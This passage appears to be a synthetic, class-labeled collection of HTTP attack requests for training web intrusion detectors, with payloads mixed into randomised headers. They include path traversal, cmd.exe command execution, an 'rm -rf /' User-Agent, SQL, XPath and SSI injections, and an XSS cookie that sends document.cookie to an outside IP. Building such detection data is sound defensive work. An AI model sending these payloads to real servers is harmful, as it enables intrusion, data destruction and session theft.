Accept-Language: aqacan5-tu;q=0.7, mscDrole-f, ou0-ed;q=0.6, mcilmjn-1deue;q=0.5, ikn8fai-gatnk;q=0.2
Cache-Control: max-stale
Client-ip: 200.118.96.244
Date: Tue, 31 May 05 15:02:07 UTC
ETag: W/"Uu@KUzA.0IwnkVwHL"
Expect: dba1sa=tthE5m5;Hslkv=anlsPoas
If-Modified-Since: Fri, 13 Aug 04 02:49:14 CET
If-Unmodified-Since: Sat, 19 Sep 09 12:19:23 GMT
Authorization: ehfne e9ye6el=qtob
Referer: http://www.lzhcq9uh.net/mwmtpjgc/yhotiMCy.php3
TE: trailers,chunked;q=0.6
User-Agent: Mozilla/8.1 (Machintosh; U; Mac OS X 7.0; R4-er; rv:5.0.9) Gecko/86541308
Via: 9.1 www.s7Hgto.gif, 3.0 73.161.249.246

null

End - Id: 41177
Start - Id: 36050
class: PathTransversal
GET /jsagpd0epeswmnl7uetr/4rrtian6he/1Uhea/xp_O_poww0F/8hheicep5t3d2dad/aft0erdieticygiale/ha7ehsA3nsk5lvc/ehfsdyim1oede9asl/ere7rmzaeltaoem/nutt.png?hdy=4589240063&x4f8OD-DxlS=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fstenon%2Fasmaiena%2Fse%2Fie.bin&netexrxt=oU._jD1V&zlnefhs1h4dfUho=0j8u8eR&sAtiotts=tshhere1rRey9&sovroai=412803888&4Shlrh=5&3fnw=74A&niexudareec1cnn=Esaad&c1=37NFRc&famoetrurrn=813&c6n3d4ee=si4gIDmr&ebeshielsv=ktimgwR HTTP/1.0
Host: www.hci9in.fr:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: tgeeTtti-agq;q=0.4
Cache-Control: no-store
Client-ip: 54.187.94.95
Cookie: csM=rFV;ebhrso=A;ogptohWi= systemw
Cookie2: $Version="4"
Date: Mon, 05 Apr 04 01:02:04 UTC
ETag: W/".l1xi4XzvcD1Rn.Isdt"
Expect: nSnorec=amMwieb;4mydye
From: prei@enuhageatF.uk
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Sun, 18 Feb 07 11:38:15 UTC
If-Match: "ZHPJIOmFl2_PVNMY_ju"
If-None-Match: *
If-Range: Wed, 03 Mar 10 12:32:05 GMT
Max-Forwards: 446
MIME-Version: 5.0
Pragma: e='ent'
Proxy-Authorization: itAtO nenh=umit9nn
Authorization: Digest nc=05dd6aeD
Range: 0502-,-95,28345-0
Referer: /6ttcmr86/iohxew/ht9nsl/gent74.pl
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/7.2 (Windows; U; WinNT 7.3; oa-n3; rv:5.5.4) Gecko/63164425
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 5.8 www.z8hmu.jpg, uie0ru/3.3 www.ixct1es.tiff, 6.4 www.tedtxer.jpeg
Transfer-Encoding: gzip
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 503 230.183.212.133 "reoem7gfiotv8mdeeL0V" "Sat, 30 Jan 10 17:01:26 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 2881124035235
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36050
Start - Id: 49015
class: XPathInjection
GET /tsesoixrwf1eo/oe/ohetsiGv/sb/7aryI0d9zQHOHbgsound./jemije/selecthlj@styleOboG_/RBlJ6US7inOvbscript@xZhtpass/Gdcaohrotdtbr9z/hP4/p0GQiCHLTQujMU9Ht.cgi?nldhnseyt=1976&aArhb8eNn=r4aetOvm4i&hhhssSnt=9&trhehowetsiua=tKbqeec%3Fbo&jeeuhreu=9213856741&nunhmrsira0=ar5Wsy%27+++++or++6++++%3C+count%28path%2Fchild%3A%3A*%29++++or++++%27Htb%27++++%3D++++%27&ey=qdsagenpOtt+&Taeae=eT1pW78zp&ehb=t5tqhwfR3&2wciYEhrdlonmg=rTu&AmweonEbta3ta=3655905&t6gri6=thl&U7style.EmXGn=8&ixt1exrG=ed%27t HTTP/1.0
Host: www.ohle1.cz:7869
Connection: close
Accept: text/*, text/plain;q=0.2, application/*
Accept-Charset: hz-gb-2312;q=0.8
Accept-Encoding: *
Accept-Language: lteotsai-Ay54;q=0.5, ad-R
Cache-Control: max-age=93157
Client-ip: 5.173.173.39
Cookie: 5etquideresr1qo=VctLmpsE@liouunt;uinYixG=764753;lttnen=aod;T0tett3t=03487;lsa3o9ts=zRR8
Cookie2: $Version="4"
Date: Mon, 22 Mar 04 22:33:06 UTC
ETag: "fenyfz9ehkcpexX1K"
Expect: erftrsq=eavsowes
From: mn1eatis@ye8qeam0O8.be
If-Modified-Since: Sun, 10 Aug 08 01:40:53 GMT
If-Unmodified-Since: Thu, 14 Jan 10 21:18:24 UTC
If-Match: "DpUV2ZqyRvmEGmRtq5i"
If-None-Match: *
If-Range: *
Max-Forwards: 5465
MIME-Version: 9.3
Pragma: c='e'
Proxy-Authorization: NTLM aXNlcm54Q3Nsa2FvbmVOaWlvQWV0bG9uMXhqbHdvZTg=
Authorization: tnioTc hNo5snE=nnnIad
Range: -31
Referer: http://tidMnlDt.com/Hruoeqe/Ahonh.txt
TE: deflate;q=0.1
Trailer: From
User-Agent: lmXbo/9.2.0.2
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3985x064
Via: ss1R/2.7 www.tn52oseg.gif, FTP/6.4 51.153.64.48, HTTP/9.5 56.130.255.40
Transfer-Encoding: ams4oY; 9Rqemar=5rAt7y5F
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 720 242.255.165.22 "tOitnuAIte3" "Sun, 01 Apr 07 23:33:20 GMT"
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49015
Start - Id: 43613
class: OsCommanding
PUT /ix/xN62smdKT/pofatralawss/xGwnxcBwqY./aO9/s5iaeaornigds79nroOx/h9daaweiem/hdngo/demtnp/opcZPl3akcE5IHmCa.aspx? HTTP/1.1
Content-Length: 25
Content-Language: R,Tns,te
Content-Encoding: gzip
Content-Location: /o5nf6tar/wbx5/aieerxa/eee9todi/s0oz.swf
Content-MD5: NmtuZWkzYW5maDlybnFwQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Nov 07 20:15:11 UTC
Last-Modified: Mon, 03 Dec 07 17:49:16 CET
Host: www.hz4mdwtnt.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: anshtm-Ssv2;q=0.4
Cache-Control: no-transform
Cookie: Esa=LAzlikegEnguwh94s;tedwiormiae5i=8426593;ta=jr;nieadu8einjyf=roE5rG.c;az=v9CMsiac
Cookie2: $Version="5"
Date: Mon, 02 Feb 09 04:50:11 UTC
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
From: 8eurpf@iaiyaRpet.biz
If-Modified-Since: Thu, 26 Jul 07 12:13:58 UTC
If-Unmodified-Since: Sat, 21 Feb 09 22:50:19 CET
If-Match: *
If-None-Match: "J-6QL0EMG-5oiWZbLxV"
If-Range: Mon, 28 Sep 09 08:29:47 UTC
Max-Forwards: 6
MIME-Version: 4.4
Authorization: NTLM ZXRodXlndGFocnpuYXNldGFkdGpnVXRheGFmUm92SThUaXB0aU9yZWhjbHRkOXlz
Range: 29587-,-5463,921-
Referer: http://www.ewass.de/w7vlgWiM/egpomop/aphvsea.pdf
User-Agent: `  rm    -rf    /    `
UA-CPU: x86
UA-Pixels: 6552x5468
Via: 2.4 214.230.116.251, HTTP/4.1 152.112.100.223
Transfer-Encoding: r2erw
Warning: 514 www.evidcBoe.css:898 "hdt0o" "Fri, 09 Jun 06 07:45:03 GMT"
X-Forwarded-For: 1.73.97.53
X-Serial-Number: 1018067
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

feL7oihy2i3nas=ree&et=6El

End - Id: 43613
Start - Id: 43932
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 245.10.140.129:80
Connection: close
Accept: video/*, text/*;q=0.4, image/jpeg
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.6, compress;q=0.8, identity;q=0.4
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 234.178.200.227
Cookie: e7aisVn=2+likes;i7uenEDwtton=Aa;sanitoamo88fsa=iHN@vJ0D;djaduoilsh=itdc;Pdrop7cQIE_4=2129515;dsnMt=4722494930
Cookie2: $Version="99"
Date: Fri, 27 Feb 04 21:41:10 UTC
ETag: W/"Rnf8Nocsx.lyafl8cCYu"
Expect: Hqscnnpi
From: lwml7nN@otm7kisnc.cz
If-Modified-Since: Wed, 02 Jul 08 01:27:41 UTC
If-Unmodified-Since: Mon, 12 Apr 10 12:24:17 GMT
If-Match: *
If-None-Match: "ysMR.zfJLfC@VBlM"
If-Range: "@OEafrKW4_aXCdtzo"
Max-Forwards: 171
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: ohlp koeeoec=6ohc
Range: 080946-24031
Referer: http://eoeaf.fr/it7q/stcs/ixSlsf.gz
TE: trailers,deflate;q=0.9
Trailer: If-None-Match
User-Agent: Mozilla/0.0 (Windows; U; WinNT 0.0; 9n-oe; rv:7.4.0) Gecko/57536189
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 1sai2/3.1 105.125.16.244, HTTP/3.1 68.249.181.44, 4.0 www.alnl.css:41524
Transfer-Encoding: gzip
Upgrade: ehl/0.1, iwT/4.5, eeajn/7.4
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43932
Start - Id: 42411
class: SqlInjection
GET /lAiTP_OKSW1A6xoV3i/40Labkt/gMperlmX%uYLj4libe6/12Qb0dOMsscriptXVmeta/edsfSm/WXCY7Z7DFx7f3PR.jpeg?an=382&eCeX=eota&BI6IIb2g=scinclude%27&DGoFDUgechodeletefc=ccobjvDhXS&tcdirtcur=3j%40-4&V84r5onleiel=%27+++OR++++%27MEuaeesthsr%27++++%3E+%27S&89axee3seeSalei=9708&nZO9dfN-n=nvCq7oI&aiwbdzamgkn6e=uamail6y+%40%3Daoseyu&itey=9&reutQea=esatr&bT8I@MfUa=59673748&rtn5t=fGZkk5L5&azeis=tC_&Em=aee HTTP/1.1
Host: 73.232.71.252
Connection: tepd
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: 8yzsp-tkaa, ta0ut2re-T;q=0.8, dv-uhA, 6l4oreit-te
Cache-Control: only-if-cached
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="0"
Date: Fri, 08 Oct 04 12:53:21 CET
ETag: "3Txo73O3VxszwEa72Y_"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Sat, 16 May 09 16:55:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.5
Pragma: ni=ofsrha
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: Basic ZXNkdTphYjBlYWs=
Range: -975727,63980-89,80-3
Referer: /rret/piss/l9atla/idur.cfm
TE: trailers,deflate;q=0.3
Trailer: Host
User-Agent: ihnuiYt/8.4.6.7.8
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 189x646
Via: 5.6 www.b2o1.htm, FTP/5.6 www.3ej7.html
Transfer-Encoding: identity
Upgrade: 2ac/9.1, rwme/4.7
Warning: 321 133.114.70.22 "eluta" "Thu, 01 Dec 05 01:44:32 CET"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42411
Start - Id: 35369
class: SqlInjection
GET /sHtB4/owhnnfbhvtotAnz/teCGABV.rM/kfmtahk/y1gu_connecta0@sEMTf/5nkOnyLt94esz@ni.V/rmMlqxyo/estrbd/DTC.xorcpZxqP/Zrf.html?Lneoi=passwd&ie=+%27a&tTbynoSpKe=1062&9sL4G6bqENeD=1989602020&goef=6384&1oi8witdbrh0a=%27+++OR++%27inai1sdw%27+++%3C+++%27X&a9nttecwBcnns6n=aWK&il=2&EltDs7=340631747&b4tn=585629&d3iovdrieay0a=44967092&-fNcJwD3Jj=otiah&shxwtnbraol=+%5DiHj&rndrtdxt=eLAtd&13B8.=gDYGqzHD HTTP/1.0
Host: www.oeehhdi7gn.biz
Connection: close
Accept: application/*;q=0.9, image/png, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 170.78.145.207
Cookie: sertfjfEhrLehr=8520884;Wf0m_4anode=1227430;of8idD=456;laC3lsEel=eOQLtcg
Cookie2: $Version="1"
Date: Tue, 28 Mar 06 01:44:28 UTC
ETag: "hOfZpQKb4lvYuJI"
Expect: 06leorna
From: tevu@zin09xt.com
If-Unmodified-Since: Sat, 16 Apr 05 18:20:05 CET
If-Match: *
If-None-Match: "bFdRT8xK21ndwI7ubf"
If-Range: Thu, 08 Dec 05 10:00:58 GMT
Max-Forwards: 1541
MIME-Version: 9.1
Pragma: no-cache
Authorization: N9er ltrrow=80sdtd
Range: 187-
Referer: /retn2sr/uehpen.dll
TE: trailers,trailers
Trailer: Pragma
User-Agent: onrrisO7hianp
UA-Pixels: 1597x768
Via: 5.6 104.233.219.156
Transfer-Encoding: compress
Warning: 762 www.s9npa.html "1dtnonqawlaGpaprtcfe" "Wed, 25 Jul 07 09:35:32 UTC"
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35369
Start - Id: 43895
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 77.79.101.228
Connection: laetnaer
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 132.194.132.1
Cookie: iauZteY6q=886;he=dw6raatNb;pgyetteqaf3r6=r1~at;0otndXotbOw=8itslws4;oqeaoo8=8612357245
Cookie2: $Version="03"
Date: Sun, 24 Feb 08 06:44:02 UTC
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: pni8hEt@brlOo.ch
If-Modified-Since: Mon, 22 Nov 04 13:02:31 UTC
If-Unmodified-Since: Sun, 18 Apr 10 10:00:58 GMT
If-Match: "8Srd7BqaI14qLa_DNIbX"
If-None-Match: "xmMfbKlWK96TC2ZB"
If-Range: Wed, 13 Oct 04 08:34:10 GMT
Max-Forwards: 1
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: P6xano coke=eW4hee
Range: 3121-127,822-
Referer: http://prHecch.com/diDwhgS.dll
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 4.8; Tf-ha; rv:8.5.6) Gecko/94952481
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: identity
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 76.128.111.137
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43895
Start - Id: 48248
class: XSS
PUT /esdthdib/3iiotyeerxaghsb/x@_1Yet.wBT8STH/su.Pku_c/swLiLU/2Be.exe? HTTP/1.1
Content-Length: 265
Content-Language: lbyg8
Content-Encoding: compress
Content-Location: /Xanzt3n.tiff
Content-MD5: ZTZhdmZobmdvbW9oaHpoOA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 May 09 15:25:14 CET
Last-Modified: Tue, 03 Nov 09 21:13:20 GMT
Host: www.Aureern.ch:9
Connection: esibte
Accept: video/quicktime;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.6, compress;q=0.4, deflate;q=0.3, identity
Accept-Language: *
Cache-Control: no-transform
Cookie: eedsaEE7ya=<div    onmouseover   =   "  [window.open('http://57.228.80.81/icesat.php'+document.cookie);]  "  >;WOVqFperlrAhw=ateyadmin9ex
Cookie2: $Version="35"
Date: Sat, 06 Jan 07 03:34:36 GMT
ETag: W/"xYiq1BnkHy5BVDD8r9Y"
Expect: 100-continue
From: leoau@ioycU5in.ch
If-Modified-Since: Sun, 16 Jan 05 09:44:47 CET
If-Unmodified-Since: Thu, 10 Apr 08 23:26:51 UTC
If-Match: "dovB8gv6dbXbckkd"
If-None-Match: "TlvrajzK1Vr-Ogroj1"
If-Range: *
Max-Forwards: 3118
MIME-Version: 7.8
Pragma: ehe='eo7tatzn'
Proxy-Authorization: reeeh itDs9en=Dorgunn
Authorization: lttYwC CF7U=gerE
Referer: /ampep/vmdtRise/Jtbah5.msf
TE: trailers,trailers
User-Agent: a8at5 (lxEHLU; yVT_3T0pd; c38-7F.7Qe)
UA-CPU: 68000
UA-Disp: 344,654,32
UA-Color: color16
UA-Pixels: 9341x017
Via: hsToh/2.6 134.33.167.28, 0.1 www.un6c.png
Transfer-Encoding: compress
Upgrade: anpU/1.3, qtqiol/8.7, eiaeO/6.1
Warning: 204 221.243.76.123 "neosaayxsno" "Fri, 20 May 05 05:10:12 GMT"
X-Forwarded-For: 28.135.167.162
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

vooneneipsebeL=4&1osa41t=e%ushutdowni &ienetao=yTa&cTet=eexecnWlog<odrop3es p+window.open=dik&AcNYm=lawildmwtsRAeu3jri&atn=dr&&54srNiqeasrpce=d&qmbntrim5ayitt=rRhiWExV&Cwo8-yq=dT&emIQKatmpC=7814099&kHUFM0B@30z=4&zBxi=lsL&ITisFLMCX=OondaOtn9heslbr&tb=8eney

End - Id: 48248
Start - Id: 45866
class: PathTransversal
GET /1.L85t8V/tI/C6lC32ud6rcpM/Stsoaatlsoees/illXqZdF@h@YL0EOTQS/kudghrhea7ok/ewgne/hMmiUc/cqwyhY5ohAFU/41@jNnNDgHtbodyImU/3pswd.png?re0osnqia=xp_+hnyno%3EPr&bO=ips&allJja=zni7estl5hui2&rStEdhe6lA=i03sr&efr5=epassthrug&hthvDIes=tm5Ao&oZeSbecwtntbnfl=67599&entTrah=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&ermi=imvi HTTP/1.0
Host: 129.226.193.199
Connection: keep-alive
Accept: video/mpeg;q=0.5, text/html, video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: n-denaraii;q=0.2, ss-eD;q=0.3
Cache-Control: no-store
Client-ip: 201.51.1.17
Cookie: hy6eohSai=64010;un=970201;rhrlosQc4itbxo=lad9f\scriptaEapLiy;erfeneloihdgato=eet7d;enr5=lbs
Cookie2: $Version="9"
Date: Mon, 04 Jun 07 01:39:03 UTC
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Mon, 20 Oct 08 10:31:35 CET
If-Unmodified-Since: Sun, 19 Jul 09 21:20:33 CET
If-Match: *
If-None-Match: "7pzulJtaiwjRa.ZuWwg"
If-Range: "5QXw0MQIv0tVC47.D.4n"
Max-Forwards: 71
MIME-Version: 3.5
Pragma: e='aRai'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: NTLM bmNocXNpaGQ1aXRSN3JwaWxzNmJvZXJpaW9lbWVyYmVkb3Rhb2pvbWQ=
Range: 81947-,357703-
Referer: /w5mct.sh
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.9 (Windows; U; WinNT 9.0; nt-et; rv:5.2.5) Gecko/29483572
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0549x672
Via: 5.8 236.95.231.96
Transfer-Encoding: gzip
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 645 115.27.59.90:9013 "qanewiWttmahnnlyit1n" "Thu, 03 Mar 05 21:14:02 GMT"
X-Forwarded-For: 159.83.172.168
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45866
Start - Id: 40638
class: SSI
GET /zdais/lehootDteIei/eKQYdtKXMBg_pj8q/ek.L/cwYOcabuw2KjFaFasw/jT73QqNKboot.init/netaioha/gFj@_M9TyaojeP3iMXn/wnILQ_U2wZLxDimN5/4Ungetoysinp/i5BJRlrmNI.E4.LrDY.gif?eeoinaUyNsL=de&zvGwpNkbM=w%25&.jHBdRpa=%3C%21--+++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&onjLD=v9sHoz9v0e&DELET=iQI3nTD91&e7=020&coynlde=IDEassbsar9&sn5tiIvtslsttf=1344&bentld=629126&hyutgryenez=58093&tw6Tthao5trdo=7&hs=037&i1Dnrer=eh HTTP/1.1
Host: www.losbOt.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: bh-mbd;q=0.5
Cache-Control: only-if-cached
Client-ip: 90.139.110.154
Cookie: ao5=36;ynsaocaieAlir=aDW7D;tep=940188849;eloT=agtTFXCBAW;ao5t=hL1Vscq;thfhiuogdyaMwg=5ocaktiyhrWrcra8eZ
Cookie2: $Version="602"
Date: Mon, 04 Dec 06 01:50:39 CET
ETag: "-s_wqRBhPXwnF0CQ"
Expect: faesi3c
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Sat, 26 Dec 09 01:11:33 CET
If-Unmodified-Since: Mon, 20 Nov 06 18:00:54 CET
If-Match: *
If-None-Match: "Z538Xak7SIc3lx2yJH"
If-Range: Wed, 13 Jun 07 05:26:01 UTC
Max-Forwards: 2
MIME-Version: 0.9
Pragma: Nrf6nach=Hofti
Proxy-Authorization: ctauis uahpegS=thr2
Authorization: juft neyufee=gACne
Range: 026791-2
Referer: http://www.fnFarung.uk/9yoltco/r8vxo/eoeMjon/jtef8.wav
TE: chunked;q=0.0,trailers,gzip;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/2.3 (Windows; U; WinNT 6.5; hp-ir; rv:4.0.7) Gecko/29688950
UA-CPU: x86
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color16
Via: 3.4 214.107.15.146, prNiip/7.3 www.FaarjSh.css, FTP/6.8 www.1Eims5.jpeg
Transfer-Encoding: identity
Upgrade: eeyr/9.4
Warning: 360 www.eyhc6e.gif "hnatYee8" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40638
Start - Id: 35674
class: XPathInjection
GET /aa/dheaitoedmtGeedem/ei4phosriw9r/Para0EeYee9iet/t@zi.dll?nne6artips6e=+nas2&i7sjt=hG5uu7IRP&lmswm=m0os6pted&6T2i2Hs6a=rpHt%27+++++or+++++Pa4mjT%2Fpabsh%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D56%5D+++or++%27rzbF9%27%3D++++%27 HTTP/1.1
Host: www.giaa1tx.biz
Connection: close
Accept: video/mpeg;q=0.6, video/quicktime, application/zip;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, gzip;q=0.9, compress;q=0.6
Accept-Language: of70tAsr-e, wiu6m-t, 1-s;q=0.1, szs-eaorl2;q=0.5
Cache-Control: max-stale
Client-ip: 68.97.141.43
Cookie: teaoa4eot=a=uUe f;mrlt1yegryh=04;cbSTuiTGrr=2;EUgqi6mailM_.O=ttp9;aolirmafa=625221
Cookie2: $Version="890"
Date: Sat, 13 Aug 05 05:40:34 UTC
ETag: "Llo6Q0Dtf73F-LBFZWsG"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Wed, 05 Oct 05 16:51:04 UTC
If-Unmodified-Since: Fri, 16 Jan 09 10:48:36 CET
If-Match: *
If-None-Match: *
If-Range: "GilEr.iMnvrxI0CF@"
Max-Forwards: 93
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest username="sudmt"
Authorization: NTLM ZWZvZWloc0E5ZWJldDExamlhc3BWZHlkaVk3Y2FvdG9zZXJHbjFlZXp3dg==
Range: -5103
Referer: /Aosmos.jsp
TE: chunked,trailers,deflate;q=0.4
Trailer: From
User-Agent: Mozilla/6.1 (X11; U; Linux i386 2.1; 0o-O9; rv:3.7.6) Gecko/06522745
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: HTTP/1.0 www.u0ty8a.jpg:87944, 7.0 www.tehyt.css:66324, FTP/3.8 www.nedt7eeS.shtml
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35674
Start - Id: 42082
class: SqlInjection
GET /0r@Wl1x.OdoOboNlIjU/vtH/ieIoxfdEmcRtart/mSmYv0M27Csm/a4gPn0oholRvlz-6@.jsp?ha=sU&0t=OR++++%27Agmp%27+++++BETWEEN+%27R%27++++AND+%27T%27 HTTP/1.0
Host: 58.20.135.99
Connection: close
Accept: image/jpeg;q=0.0, application/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eoqrbj-z;q=0.9, oixbo-2tn, otdis-er7rnau;q=0.2, tw7yi-iy;q=0.9, r-f;q=0.5
Cache-Control: no-store
Client-ip: 234.253.45.250
Cookie: al=xgna6@%7 ;ploJa0yjHr=lsj T;iEbrrrio=hT l;lsaiw3d5=45092
Cookie2: $Version="719"
Date: Tue, 28 Jun 05 16:24:12 GMT
ETag: "m0e.RyTZWMInQHe"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Sat, 31 Mar 07 20:51:50 GMT
If-Unmodified-Since: Tue, 28 Nov 06 14:32:11 CET
If-Match: *
If-None-Match: "naiGB7WP4dq_G622"
If-Range: "j5NgLq@Hkg6pmA8URlL"
Max-Forwards: 0
MIME-Version: 0.9
Pragma: s3l6fqGs=t
Proxy-Authorization: tczen owIa=t6tjeTgW
Authorization: NTLM bG9jb3NhcElwZWFzeGNvNXRpcmZuaWh0U2phYXJyNmE=
Range: -951
Referer: /i0tolne.zip
TE: trailers,trailers
Trailer: User-Agent
User-Agent: mdze8costrwhq
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 861x9768
Via: 7.4 www.trrsilt.gif, 9.3 www.cIefl.jpeg:40
Transfer-Encoding: deflate
Upgrade: uose/3.2, vzaeDe/0.5, 0rrE/2.7, gnnk/0.3, seow/3.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42082
Start - Id: 45500
class: PathTransversal
GET /fS/oG6b@Y@w-0oU/a0.aX/napitzho8lrtty9sO/bzxtermapIRdocumentl.css?iferi7txhb=Neus&gtsehngydtdZH=ttgms&sci=is+&ckarblnTut6t=2&pt=aI8f-4MTQ4&JB_@qs55CB8H=pacO&abg0W=eHFX5V-Ck5a&ta3izepme0=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&BitcwitRT9ol=bdw&sebDolzh=07064770&m0eeoain9re=i&Fijmterpetc=rwtimeshavingsB HTTP/1.1
Host: www.tc2gornE.ch:80
Connection: iye8
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: 6-oimohd, soaml-i, 8e-eeuRE;q=0.3, r-tnE;q=0.9, bi-axemExt
Cache-Control: max-stale=21
Client-ip: 165.251.254.128
Cookie: ts3em8isieacyrh=cn1twM;pk=htotT1e2+Di0xmludixh;d0usstoetOr=F/P><loehtftnaa5o%
Cookie2: $Version="629"
Date: Sun, 12 Oct 08 19:44:46 UTC
ETag: W/"ooU.zTt..oqEZA5r@"
Expect: shtTeapd=s0or6;ewio3=nsoo
From: rddIbt@n7reian.st
If-Modified-Since: Wed, 18 May 05 16:55:13 GMT
